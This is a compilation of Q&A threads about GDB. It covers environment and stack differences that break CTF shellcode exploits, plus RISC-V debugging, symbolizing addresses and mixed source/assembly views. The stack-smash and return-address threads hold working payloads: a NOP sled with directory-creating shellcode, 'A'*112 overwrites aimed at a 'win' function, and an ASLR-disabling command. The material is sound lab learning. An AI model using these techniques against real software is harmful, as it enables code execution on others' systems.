Differences in environment layout with and without GDB - gdb

Recently I have been working on CTF challenges that require the attacker to stage shellcode in the environment. With ASLR disabled, one can rely on there being only slight differences between the environment of the shell, for example, and that of the exploitable process (e.g. differences due only to the binary's name). However, GDB (and R2) make small changes to the environment, so addresses observed under the debugger shift slightly when the binary runs without it, which makes this very hard to do.
For example, GDB seems to at least add the environment variables LINES and COLUMNS. However, these can be removed by invoking GDB as follows:
gdb -ex 'set exec-wrapper env -u LINES -u COLUMNS' -ex 'r < exploit.input' challenge.bin
Note that GDB will implicitly use the fully qualified path when debugging a binary, so the user can further decrease any differences by invoking the binary in a similar manner.
`pwd`/challenge.bin < exploit.input
However, there still appear to be some differences. Many times I have gotten an exploit working in GDB, only to have it crash when run without the debugger. I've read mentions of a script (sometimes referred to as setenv.sh) that can (allegedly) be used to set up an environment exactly like GDB's, but I have not been able to find it.
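One way to take the inherited environment out of the picture is to start the program from the same small, fixed environment in both cases. The sketch below only builds the two command lines: one for a direct run through `env -i`, and one that passes the same `env -i` invocation to GDB's exec-wrapper. The helper name `clean_env_commands` and the example variable values are made up for illustration, and this alone is not guaranteed to make the stack layouts identical.

```python
import os
import shlex


def clean_env_commands(binary, fixed_env, stdin_file):
    """Build (direct_cmd, gdb_cmd) that both start `binary` via `env -i`.

    fixed_env is a dict of the only variables the target should see.
    The direct command still needs its stdin redirected by the caller.
    """
    path = os.path.realpath(binary)  # GDB uses the absolute path as well
    assignments = ["{}={}".format(k, v) for k, v in fixed_env.items()]

    # Direct run: env -i VAR=value ... /abs/path/to/binary
    direct = ["env", "-i"] + assignments + [path]

    # GDB run: the same env -i prefix is used as the exec-wrapper.
    wrapper = "set exec-wrapper env -i " + " ".join(
        shlex.quote(a) for a in assignments
    )
    run = "r < " + shlex.quote(stdin_file)
    gdb = ["gdb", "-ex", wrapper, "-ex", run, path]
    return direct, gdb


if __name__ == "__main__":
    direct, gdb = clean_env_commands(
        "challenge.bin", {"SHELLCODE": "placeholder"}, "exploit.input"
    )
    print(" ".join(shlex.quote(p) for p in direct), "< exploit.input")
    print(" ".join(shlex.quote(p) for p in gdb))
```

Because both runs go through `env`, whatever `env` itself does to the process before exec applies equally to both.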
Looking at the env of the shell:
LANG=en_US.UTF-8
PROFILEHOME=
DISPLAY=:0
OLDPWD=/home/user
SHELL_SESSION_ID=e7a0e681012e480fb044a034a775bb83
INVOCATION_ID=8ef3be94d09f4e47a0322ddf0d6ed787
COLORTERM=truecolor
MOZ_PLUGIN_PATH=/usr/lib/mozilla/plugins
XDG_VTNR=1
XDG_SESSION_ID=c1
USER=user
PWD=/test
HOME=/home/user
JOURNAL_STREAM=9:15350
KONSOLE_DBUS_SESSION=/Sessions/1
KONSOLE_DBUS_WINDOW=/Windows/1
GTK_MODULES=canberra-gtk-module
MAIL=/var/spool/mail/user
WINDOWPATH=1
TERM=xterm-256color
SHELL=/bin/bash
KONSOLE_DBUS_SERVICE=:1.7
KONSOLE_PROFILE_NAME=Profile 1
SHELLCODE=����
XDG_SEAT=seat0
SHLVL=4
COLORFGBG=15;0
LANGUAGE=
WINDOWID=16777222
LOGNAME=user
DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1000/bus
XDG_RUNTIME_DIR=/run/user/1000
XAUTHORITY=/home/user/.Xauthority
PATH=/usr/local/sbin:/usr/local/bin:/usr/bin:/usr/bin/site_perl:/usr/bin/vendor_perl:/usr/bin/core_perl
_=/usr/bin/env
And comparing it to that of GDB (LINES and COLUMNS removed):
/test/challenge.bin
_=/usr/bin/gdb
LANG=en_US.UTF-8
DISPLAY=:0
PROFILEHOME=
OLDPWD=/home/user
SHELL_SESSION_ID=e7a0e681012e480fb044a034a775bb83
INVOCATION_ID=8ef3be94d09f4e47a0322ddf0d6ed787
COLORTERM=truecolor
MOZ_PLUGIN_PATH=/usr/lib/mozilla/plugins
XDG_VTNR=1
XDG_SESSION_ID=c1
USER=user
PWD=/test
HOME=/home/user
JOURNAL_STREAM=9:15350
KONSOLE_DBUS_SESSION=/Sessions/1
KONSOLE_DBUS_WINDOW=/Windows/1
GTK_MODULES=canberra-gtk-module
MAIL=/var/spool/mail/user
WINDOWPATH=1
SHELL=/bin/bash
TERM=xterm-256color
KONSOLE_DBUS_SERVICE=:1.7
KONSOLE_PROFILE_NAME=Profile 1
SHELLCODE=����
COLORFGBG=15;0
SHLVL=4
XDG_SEAT=seat0
LANGUAGE=
WINDOWID=16777222
LOGNAME=user
DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1000/bus
XDG_RUNTIME_DIR=/run/user/1000
XAUTHORITY=/home/user/.Xauthority
PATH=/usr/local/sbin:/usr/local/bin:/usr/bin:/usr/bin/site_perl:/usr/bin/vendor_perl:/usr/bin/core_perl
/test/challenge.bin
One can see the environments are not very different on inspection. Notably, the GDB env seems to have a second instance of the debugged binary's name (e.g. challenge.bin, in this case), as well as the fact that it sets _ to GDB rather than the debugged binary. The offsets seem to be way off, even when taking these small changes into account.
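Comparing two such dumps by eye is error-prone (the two listings above, for instance, do not list TERM and SHELL in the same order), so a small script can help. The following is a minimal sketch, assuming each dump is plain text with one NAME=value entry per line; the function names are invented for this example. It reports variables present on only one side, variables whose values differ, whether the shared variables appear in the same order, and the difference in total string size (each entry counted with its terminating NUL).

```python
def parse_env_dump(text):
    """Parse NAME=value lines into an ordered list of (name, value) pairs.

    Lines without '=' (such as a bare program path) get value None.
    """
    pairs = []
    for line in text.splitlines():
        if not line.strip():
            continue
        name, sep, value = line.partition("=")
        pairs.append((name, value if sep else None))
    return pairs


def stack_bytes(pairs):
    """Bytes the strings would occupy, one NUL per entry (assumes ASCII)."""
    total = 0
    for name, value in pairs:
        total += len(name) + 1  # name plus terminating NUL
        if value is not None:
            total += 1 + len(value)  # '=' plus value
    return total


def diff_env(shell_dump, gdb_dump):
    """Summarize how two environment dumps differ."""
    shell_pairs = parse_env_dump(shell_dump)
    gdb_pairs = parse_env_dump(gdb_dump)
    shell, gdb = dict(shell_pairs), dict(gdb_pairs)
    common = set(shell) & set(gdb)
    shell_order = [n for n, _ in shell_pairs if n in common]
    gdb_order = [n for n, _ in gdb_pairs if n in common]
    return {
        "only_in_shell": sorted(set(shell) - set(gdb)),
        "only_in_gdb": sorted(set(gdb) - set(shell)),
        "changed": sorted(k for k in common if shell[k] != gdb[k]),
        "same_order": shell_order == gdb_order,
        "size_delta": stack_bytes(gdb_pairs) - stack_bytes(shell_pairs),
    }


if __name__ == "__main__":
    shell = "A=1\n_=/usr/bin/env\nXDG_VTNR=1\n"
    gdb = "_=/usr/bin/gdb\nA=1\nLINES=24\n"
    for key, value in diff_env(shell, gdb).items():
        print(key, value)
```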
TL;DR
How can the GDB environment differences be nulled out for the case when it is necessary to know a priori the locations of things in the environment with and without the debugger running?
In the interest of laziness, has anyone fully characterized the environment with and without GDB, or the changes GDB makes?
And for those interested, R2 appears to make changes to PATH. There may also be other differences.

How can the GDB environment differences be nulled out
One way is to run the binary outside of GDB (have the binary wait for GDB to attach, as described here), and attach GDB to it from "outside".
Update:
the binary in question is part of a challenge and source is not provided
You can patch _start with a jmp _start (so the binary will never progress past the first instruction). Once attached, replace the jmp with the original instruction, and start debugging.
Update 2:
Are you familiar with a better process?
In order to find offset of a given function in the ELF file, you need two values: offset of the function within section, and offset of section within the file.
For example:
$ readelf -Ws a.out | grep ' _start'
58: 00000000004003b0 43 FUNC GLOBAL DEFAULT 11 _start
This tells you that _start is linked at 0x4003b0 in section 11.
What is that section, what is its starting address, and where in the file does it start?
$ readelf -WS a.out | grep '\[11\]'
[11] .text PROGBITS 00000000004003b0 0003b0 000151 00 AX 0 0 16
We now see that _start is at the very start of .text (this is usually the case), and that .text starts at offset 0x3b0 in the file. QED.
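The arithmetic behind those two readelf lookups is small enough to write down. This is only a sketch; the helper name `file_offset` is made up, and the numbers in the usage line are the ones from the readelf output above.

```python
def file_offset(symbol_addr, section_addr, section_file_offset):
    """File offset of a symbol.

    symbol_addr:          address from `readelf -Ws` (e.g. 0x4003b0)
    section_addr:         section start address from `readelf -WS`
    section_file_offset:  section offset in the file from `readelf -WS`
    """
    offset_in_section = symbol_addr - section_addr
    return section_file_offset + offset_in_section


if __name__ == "__main__":
    # _start at 0x4003b0, .text at 0x4003b0, .text file offset 0x3b0
    print(hex(file_offset(0x4003B0, 0x4003B0, 0x3B0)))
```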
An even better process is to use GDB to perform the patching (GDB will do all the offset finding for you). Suppose I want to overwrite the first byte of _start with an int3 (0xCC) instruction:
$ gdb --write -q ./a.out
Reading symbols from ./a.out...done.
Let's look at the original instructions first:
(gdb) x/4i _start
0x4003b0 <_start>: xor %ebp,%ebp
0x4003b2 <_start+2>: mov %rdx,%r9
0x4003b5 <_start+5>: pop %rsi
0x4003b6 <_start+6>: mov %rsp,%rdx
Now let's patch the first one:
(gdb) set *(char*)0x4003b0 = 0xCC
(gdb) x/4i _start
0x4003b0 <_start>: int3
0x4003b1 <_start+1>: in (%dx),%eax
0x4003b2 <_start+2>: mov %rdx,%r9
0x4003b5 <_start+5>: pop %rsi
(gdb) quit
Segmentation fault (core dumped) <<-- this is a GDB bug. I should fix it some day.
$ objdump -d a.out
...
Disassembly of section .text:
00000000004003b0 <_start>:
4003b0: cc int3 <<-- success!
4003b1: ed in (%dx),%eax
4003b2: 49 89 d1 mov %rdx,%r9
...
Voila!
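If GDB's --write mode is not an option, the same patch can be applied directly to the file once the offset is known. The sketch below is an illustration rather than a polished tool: `patch_bytes` is a made-up helper that overwrites bytes at a file offset and returns what was there before, so the original instruction can be restored later. On x86, the two bytes EB FE encode a short jump to itself, which is the "jmp _start" loop suggested earlier when placed at _start. The demo runs on a scratch file, not on a real binary.

```python
import os
import tempfile


def patch_bytes(path, offset, new_bytes):
    """Overwrite len(new_bytes) bytes at `offset`; return the old bytes."""
    with open(path, "r+b") as f:
        f.seek(offset)
        original = f.read(len(new_bytes))
        if len(original) != len(new_bytes):
            raise ValueError("patch would extend past the end of the file")
        f.seek(offset)
        f.write(new_bytes)
    return original


if __name__ == "__main__":
    # Scratch file standing in for the first bytes of _start.
    fd, scratch = tempfile.mkstemp()
    os.write(fd, b"\x31\xed\x49\x89\xd1")  # xor %ebp,%ebp; mov %rdx,%r9
    os.close(fd)

    saved = patch_bytes(scratch, 0, b"\xeb\xfe")  # jump-to-self loop
    print("saved original bytes:", saved.hex())
    patch_bytes(scratch, 0, saved)                # put the original back
    os.remove(scratch)
```

For a real binary, the offset would be the file offset computed from the readelf output (0x3b0 in the example above), and it is worth working on a copy.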

Related

reverse engineering (stack-smash) how to find out the address of the stack where the data that I entered into the program is written in the stack

So, my English is very bad, but I will try to explain my problem clearly (sorry about that).
I have a program in the C programming language:
#include <stdio.h>
#include <string.h>
void vuln_func(char *data) {
char buff[256];
strcpy(buff, data);
}
void main(int argc, char *argv[]) {
vuln_func(argv[1]);
}
The program accepts any line for input. I want to enter a payload into it, which will create a TEST directory in the directory from which this program is launched.
How it works:
I run a program in the debugger with a string containing the payload:
(gdb) r $(python -c 'print "\x90" * 233 + "\x31\xc0\x50\x68\x54\x45\x53\x54\xb0\x27\x89\xe3\x66\x41\xcd\x80\xb0\x0f\x66\xb9\xff\x01\xcd\x80\x31\xc0\x40\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\x59\xee\xff\xbf"')
In the payload, first there are 233 "nop" instructions, then the shellcode that creates the "TEST" directory, then the address to which the program should go when it reaches the "ret" instruction
Part of the program code in the form of instructions in the debugger:
(gdb) disas vuln_func
Dump of assembler code for function vuln_func:
0x0804840b <+0>: push ebp
0x0804840c <+1>: mov ebp,esp
0x0804840e <+3>: sub esp,0x108
0x08048414 <+9>: sub esp,0x8
0x08048417 <+12>: push DWORD PTR [ebp+0x8]
0x0804841a <+15>: lea eax,[ebp-0x108]
0x08048420 <+21>: push eax
0x08048421 <+22>: call 0x80482e0 <strcpy@plt>
0x08048426 <+27>: add esp,0x10
0x08048429 <+30>: nop
0x0804842a <+31>: leave
0x0804842b <+32>: ret
End of assembler dump.
So, the "strcpy" function puts the string that we entered into the program on the stack.
Then a couple more instructions are executed. When the program reaches the "ret" instruction, the return address is on the stack. By default, it points to an address in the "main" function. I want it to point to my payload located on the stack. When the program is executed through the debugger, I can see where the return address lies on the stack and calculate the required number of "nop" instructions before the payload and the value of the desired return address. But what should I do when I want to execute the program without a debugger? How do I find out where my shellcode is on the stack?
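The payload layout described above can be checked with a few lines of Python. This is a sketch under stated assumptions: the buffer offset 0x108 is taken from the `lea eax,[ebp-0x108]` line in the disassembly, the saved EBP is assumed to occupy the 4 bytes just above the buffer, and the 35-byte shellcode is replaced by a stand-in of the same length. The helper name `build_payload` is made up.

```python
import struct

BUF_OFFSET_FROM_EBP = 0x108  # from `lea eax,[ebp-0x108]`
SAVED_EBP_SIZE = 4           # 32-bit saved frame pointer


def build_payload(shellcode, ret_addr, nop=b"\x90"):
    """NOP sled + shellcode up to the return address, then the new address."""
    ret_offset = BUF_OFFSET_FROM_EBP + SAVED_EBP_SIZE  # 268 bytes
    sled_len = ret_offset - len(shellcode)
    if sled_len < 0:
        raise ValueError("shellcode does not fit before the return address")
    payload = nop * sled_len + shellcode + struct.pack("<I", ret_addr)
    if b"\x00" in payload:
        # strcpy stops at the first NUL byte, so the copy would be cut short
        raise ValueError("payload contains a NUL byte")
    return payload


if __name__ == "__main__":
    stand_in = b"\xcc" * 35  # placeholder with the same length as the shellcode
    p = build_payload(stand_in, 0xBFFFEE59)
    print(len(p), "bytes,", len(p) - 35 - 4, "NOPs, tail", p[-4:].hex())
```

With a 35-byte shellcode this yields 233 NOPs, which matches the count used in the command above.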
I tried using the same return address that I used in the payload via the debugger, but my ubuntu system reports the error "Segmentation fault (core dumped)" . That is, the return address does not correspond to the real address space of the stack, which is allocated for this program when running through the ubuntu terminal.
update: I looked at the core dump of this program. Every time I run it through the terminal, the stack address changes a lot. Here are a few stack addresses where my shell code was located:
0xbfda4161
0xbfc89161
0xbf944161
Why does the stack address change so much if I have already disabled address space randomization?
The value of the esp register on entry into main depends on the environment variables and the size of the argv[n] strings (in addition to being randomized by the kernel, which you've turned off).
I suspect that in your case the difference is caused by argv[0], which GDB tends to resolve to the full pathname of the binary.
You didn't tell us how you invoke the vulnerable binary outside of GDB. If you do something like ./vuln $(python -c ...) or vuln $(python -c ...), try running it as $(realpath ./vuln) $(python -c ...) instead -- that should match what happens in GDB.
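When the binary is launched from a script instead of a shell, the same idea applies: pass the resolved absolute path as the program name so that argv[0] matches what GDB would use. A minimal sketch, with `gdb_like_argv` as a made-up helper name and `./vuln` as in the example above:

```python
import os


def gdb_like_argv(binary, args):
    """Return an argv list whose first element is the absolute path."""
    return [os.path.realpath(binary)] + list(args)


def argv0_growth(binary):
    """How many bytes longer argv[0] becomes when the path is resolved."""
    return len(os.path.realpath(binary)) - len(binary)


if __name__ == "__main__":
    argv = gdb_like_argv("./vuln", ["AAAA"])
    print(argv, "argv[0] grows by", argv0_growth("./vuln"), "bytes")
    # To actually run it: subprocess.run(argv)
```

The length difference gives a rough idea of how far stack contents can move between the two ways of launching the program, although alignment of the stack may change the exact amount.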
I solved the problem.
Firstly, I had not realized that the setting that disables ASLR is reset every time I log out.
How to do:
Disable ASLR. For ubuntu 16, I used the following command: echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
View the core dump data. I did it using the "coredumpctl" utility.
First I looked at the list of crashed programs: coredumpctl list, and found the process ID of my program in it.
Then I opened the dump in the debugger: coredumpctl gdb your_proc_pid.
In the debugger, I looked at the stack address using: (gdb) info stack, found where my payload lies in the stack: x/90xw 0xstack_address.
I changed the address in my payload, now the program does not break when running in the terminal.
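Since the setting does not persist, it can be worth checking it before each test run. The sketch below reads the same file that the tee command above writes to; `read_aslr_mode` is a made-up helper, and the descriptions follow the kernel's documented meaning of the values 0, 1 and 2.

```python
ASLR_PATH = "/proc/sys/kernel/randomize_va_space"

ASLR_MODES = {
    0: "disabled",
    1: "stack, mmap base and vDSO randomized",
    2: "as 1, plus heap (brk) randomization",
}


def read_aslr_mode(path=ASLR_PATH):
    """Return the current randomize_va_space value as an int."""
    with open(path) as f:
        return int(f.read().strip())


if __name__ == "__main__":
    mode = read_aslr_mode()
    print(mode, "-", ASLR_MODES.get(mode, "unknown"))
    if mode != 0:
        print("ASLR is on; addresses taken from a core dump will not repeat")
```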

GDB qemu "Cannot access memory at address..."

I have a simple program that I am using to test a Python RISC-V disassembler I am making, and I want to use gdb/qemu to check my work. The program is literally just this:
int main(int argc, char *argv[]) {
while (1);
return 0;
}
this is the command I am using to start gdb:
gdb-multiarch ./test -ex "target remote :7224" -ex "tbreak main:4" -ex "continue"
This is what was used to compile it:
riscv64-linux-gnu-gcc -o test test.c
But I am getting this error when I try to change any memory values:
(gdb) disassemble
Dump of assembler code for function main:
0x00000040000005ea <+0>: addi sp,sp,-32
=> 0x00000040000005ec <+2>: sd s0,24(sp)
0x00000040000005ee <+4>: addi s0,sp,32
0x00000040000005f0 <+6>: mv a5,a0
0x00000040000005f2 <+8>: sd a1,-32(s0)
0x00000040000005f6 <+12>: sw a5,-20(s0)
0x00000040000005fa <+16>: j 0x40000005fa <main+16>
End of assembler dump.
(gdb) set *(int*) $pc = 0x2e325f43
Cannot access memory at address 0x40000005ec
I just want to see what instruction gdb interprets with the bytes I set. Google has been little to no help with this. What could I be doing wrong?
Figured it out in a stupid manner.
set $pc = $sp
Then I can change the pc
This command:
set *(int*) $pc = 0x2e325f43
is trying to write a value to the memory the PC currently points at (that's 0x00000040000005ec in this case). As it happens, that memory is read-only, which is pretty usual for areas of memory with code in them[*]. So gdb tells you it can't write there. You should be able to write to memory which isn't read-only.
[*] With a suitable linker map you can create binaries which have the code in writeable memory. But the default for Linux executables is that code segments are read-only.
Your other command:
set $pc = $sp
changes the PC; it sets it to whatever the stack pointer is pointing at. That's going to be fatal for any further attempts to execute code, unless you put some code there, of course. As it happens, the stack is generally writeable, which is why writing to the memory pointed to by the PC then works.
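For checking a disassembler against GDB, it helps to know exactly which bytes a command like `set *(int*) $pc = 0x2e325f43` stores and how many of them form the first instruction. The sketch below assumes a little-endian target (which the usual RISC-V Linux toolchains are) and uses the standard RISC-V length rule based on the low bits of the first 16-bit parcel. The function names are invented for this example.

```python
import struct


def le_bytes(value):
    """Bytes written to memory for a 32-bit store on a little-endian target."""
    return struct.pack("<I", value)


def riscv_insn_length(first_parcel):
    """Instruction length in bytes from the first 16-bit parcel.

    Returns 2 for compressed instructions, 4 for standard ones, and None
    for the longer encodings that this sketch does not handle.
    """
    if first_parcel & 0b11 != 0b11:
        return 2
    if first_parcel & 0b11100 != 0b11100:
        return 4
    return None


if __name__ == "__main__":
    raw = le_bytes(0x2E325F43)
    parcel = struct.unpack("<H", raw[:2])[0]
    print(raw.hex(), "-> first instruction is", riscv_insn_length(parcel), "bytes")
```

The disassembly above shows instructions at main+0 and main+2, two bytes apart, which is consistent with compressed instructions being in use.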

How to generate payload with python for buffer overflow?

I'm trying to provoke a buffer overflow in order to execute a function in C code. So far I have managed to find the number of bytes needed to overwrite the EBP register. The only thing left is to replace the address in EIP with that of the function I wish to execute. I'm trying to generate this payload with Python. For this I use the following:
python -c 'print "A"*112 + "\x3b\x86\x04\x08"' > attack_payload
This is what I get
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;�
Notice those last characters! I know that it's not what I was supposed to get. The address I want in the EIP register is 0804863b. I had to put it in little-endian order for the exploit to run properly. Any comments on this?
If you run this payload:
python -c 'print "A"*112 + "B"*4' > attack_payload
and then see that you have control of the PC (EIP=42424242):
(gdb) r < attack_payload
You can replace the "BBBB" with your address 0804863b
python -c 'print "A"*112 + "\x3b\x86\x04\x08"' > attack_payload
That is all. You should first verify that you actually control EIP.
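The one-liners above rely on Python 2, where print writes the string's bytes unchanged. Under Python 3, printing a str containing "\x86" would encode it as UTF-8 and produce different bytes, so the payload should be built as bytes and written in binary mode. A minimal sketch, with made-up helper names and the address from the question:

```python
import struct


def build_ret_overwrite(ret_addr, padding_len=112):
    """Padding followed by a 32-bit little-endian return address."""
    return b"A" * padding_len + struct.pack("<I", ret_addr)


def write_payload(path, payload):
    """Write the raw bytes; no encoding and no trailing newline is added."""
    with open(path, "wb") as f:
        f.write(payload)


if __name__ == "__main__":
    payload = build_ret_overwrite(0x0804863B)
    write_payload("attack_payload", payload)
    print(len(payload), "bytes written, tail", payload[-4:].hex())
```

Python 2's print also appends a newline; if the target reads a whole line, append b"\n" to the payload to get the same input. The odd-looking characters at the end of the printed output are simply how the terminal renders the non-printable address bytes.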
More info (I see the source code), in a simple way (for a better explanation) try to compile with the following command
gcc -o main main.c -fno-stack-protector -g -m32
Run it with the debugger (gdb ./main) and set the following breakpoint
gef➤ b 13
Breakpoint 2 at 0x8048611: file main.c, line 13.
Continue and insert the following payload
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCC
Go on at the instruction
→ 0x804862d <stringLength+60> ret
And you can see that now you have the control of the ret value
gef➤ bt
#0 0x0804862d in stringLength () at main.c:14
#1 0x43434343 in ?? ()
#2 0x08048800 in ?? ()
Backtrace stopped: previous frame inner to this frame (corrupt stack?)
gef➤ x/x $sp
0xffffd5ec: 0x43434343
Now you can replace "CCCC" with the address of the win function
gef➤ p win
$1 = {void ()} 0x80485dd <win>
You can automate all of this with a simple Python script (have a look at the pwntools library). Your payload will be:
payload = "A" * 112
payload += "\xdd\x85\x04\x08"
Or also you can run
python -c 'print "1"+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+"\xdd\x85\x04\x08"' | ./main

How to get line number from libunwind and AddressSanitizer listed as <shared object>+offset?

I often get stack traces from libunwind or AddressSanitizer like this:
#12 0x7ffff4b47063 (/home/janw/src/pl-devel/lib/x86_64-linux/libswipl.so.7.1.13+0x1f5063)
#13 0x7ffff4b2c783 (/home/janw/src/pl-devel/lib/x86_64-linux/libswipl.so.7.1.13+0x1da783)
#14 0x7ffff4b2cca4 (/home/janw/src/pl-devel/lib/x86_64-linux/libswipl.so.7.1.13+0x1daca4)
#15 0x7ffff4b2cf42 (/home/janw/src/pl-devel/lib/x86_64-linux/libswipl.so.7.1.13+0x1daf42)
I know that if I have gdb attached to the still living process, I can use this to get details
on the location:
(gdb) list *0x7ffff4b47063
But if the process has died, I cannot just restart it under gdb and use the above, because
address randomization gives me the wrong result (at least, that is my assumption;
I clearly do not get meaningful locations). So, I tried
% gdb program
% run
<get to the place everything is loaded and type Control-C>
(gdb) info shared
<Dumps mapping location of shared objects>
(gdb) list *(<base of libswipl.so.7.1.13>+0x1f5063)
But, this either lists nothing or clearly the wrong location. This sounds simple, but
I failed to find the answer :-( Platform is 64-bit Linux, but I guess this applies to
any platform.
(gdb) info shared
<Dumps mapping location of shared objects>
Unfortunately, the above does not dump the actual mapping location in a form that is usable with this:
libswipl.so.7.1.13+0x1f5063
(as you've discovered). Rather, GDB output lists where the .text section was mapped, not where the ELF binary itself was mapped.
You can adjust for .text offset by finding it in
readelf -WS libswipl.so.7.1.13 | grep '\.text'
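The adjustment can be written out as follows. This is a sketch that assumes the library is linked with a base address of 0 (typical for shared objects), so that the Address column readelf prints for .text is relative to the load base. The .text values in the usage example are hypothetical; only the frame address and the +0x1f5063 offset come from the stack trace above.

```python
def load_base(text_runtime_addr, text_section_addr):
    """Where the ELF file itself was mapped.

    text_runtime_addr: "From" address GDB prints in `info shared`
    text_section_addr: Address column for .text in `readelf -WS`
    """
    return text_runtime_addr - text_section_addr


def runtime_address(text_runtime_addr, text_section_addr, module_offset):
    """Address to pass to `list *ADDR` for a <module>+offset frame."""
    return load_base(text_runtime_addr, text_section_addr) + module_offset


if __name__ == "__main__":
    # Hypothetical: .text at 0x2a000 in the file, mapped at 0x7ffff497c000.
    addr = runtime_address(0x7FFFF497C000, 0x2A000, 0x1F5063)
    print("(gdb) list *" + hex(addr))
```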
It might be easier to use addr2line instead. Something like
addr2line -fe libswipl.so.7.1.13 0x1f5063 0x1da783
should work.
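For longer traces, the offsets can be pulled out of the frame lines and grouped per module before being handed to addr2line. The following is a sketch: the regular expression is written for the frame format shown in the question, and the function names are made up. It only builds the command lines (using the same -f and -e options as above); running them is left to the caller.

```python
import re

# Matches e.g.: #12 0x7ffff4b47063 (/path/to/lib.so+0x1f5063)
FRAME_RE = re.compile(r"#(\d+)\s+(0x[0-9a-fA-F]+)\s+\((.+)\+(0x[0-9a-fA-F]+)\)")


def parse_frame(line):
    """Return (frame_no, address, module_path, offset) or None."""
    m = FRAME_RE.search(line)
    if not m:
        return None
    return int(m.group(1)), int(m.group(2), 16), m.group(3), int(m.group(4), 16)


def addr2line_commands(lines):
    """One addr2line argv per module, with offsets in trace order."""
    by_module = {}
    for line in lines:
        frame = parse_frame(line)
        if frame is None:
            continue
        _, _, module, offset = frame
        by_module.setdefault(module, []).append(hex(offset))
    return [["addr2line", "-f", "-e", module] + offsets
            for module, offsets in by_module.items()]


if __name__ == "__main__":
    trace = [
        "#12 0x7ffff4b47063 (/home/janw/src/pl-devel/lib/x86_64-linux/libswipl.so.7.1.13+0x1f5063)",
        "#13 0x7ffff4b2c783 (/home/janw/src/pl-devel/lib/x86_64-linux/libswipl.so.7.1.13+0x1da783)",
    ]
    for cmd in addr2line_commands(trace):
        print(" ".join(cmd))  # could be passed to subprocess.run(cmd)
```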
Please see http://clang.llvm.org/docs/AddressSanitizer.html for the instructions on using the asan_symbolize.py script and/or the symbolize=true option.

View Both Assembly and C code

Is there a way to view both the assembly and the C code using gdb?
disassemble function_name shows only the assembly; I was trying to find a way to easily map C code to assembly.
Thanks
You can run gdb in Text User Interface (TUI) mode:
gdb -tui <your-binary>
(gdb) b main
(gdb) r
(gdb) layout split
The layout split command divides the window into two parts - one of them displaying the source code, the other one the corresponding assembly.
A few other tricks:
set disassembly-flavor intel - if you prefer Intel notation
set print asm-demangle - demangles C++ names in assembly view
ni - next instruction
si - step instruction
If you do not want to use the TUI mode (e.g. your terminal does not like it), you can always do:
x /12i $pc
which means print 12 instructions from current program counter address - this also works with the tricks above (demangling, stepping instructions, etc.).
The "x /12i $pc" trick works in both gdb and cgdb, whereas "layout split" only works in gdb.
Enjoy :)
Try disassemble /m.
Refer to http://sourceware.org/gdb/current/onlinedocs/gdb/Machine-Code.html#Machine-Code
The format is similar to that of objdump -S, and intermixes source with disassembly. Sample output excerpt:
10 int i = 0;
=> 0x0000000000400536 <+9>: movl $0x0,-0x14(%rbp)
11 while (1) {
12 i++;
0x000000000040053d <+16>: addl $0x1,-0x14(%rbp)
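The same mixed listing can be captured non-interactively, for example to save it to a file. The sketch below only builds a GDB command line using batch mode; `mixed_listing_command` is a made-up helper, and the program and function names in the usage example are placeholders.

```python
def mixed_listing_command(binary, function):
    """argv for a one-shot GDB run that prints source mixed with assembly."""
    return [
        "gdb",
        "-batch",                                # run the commands, then exit
        "-ex", "disassemble /m " + function,     # source-centric mixed listing
        binary,
    ]


if __name__ == "__main__":
    cmd = mixed_listing_command("./a.out", "main")
    print(cmd)
    # To capture the output:
    #   import subprocess
    #   text = subprocess.run(cmd, capture_output=True, text=True).stdout
```

The binary needs to be compiled with debug information (-g) for the source lines to appear.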
For your purpose, try
objdump -S <your_object_file>
from man objdump:
-S
--source
Display source code intermixed with disassembly, if possible.
Implies -d.
The fastest way to obtain this is to press the key combination ctrl-x 2 after launching gdb.
This will give you immediately a split window with source code and assembly in Text User Interface Mode (described in accepted answer).
One more tip: in this mode the arrow keys scroll up and down through the source code. To use them for command history again, press ctrl-x o, which moves the focus back to the gdb command window.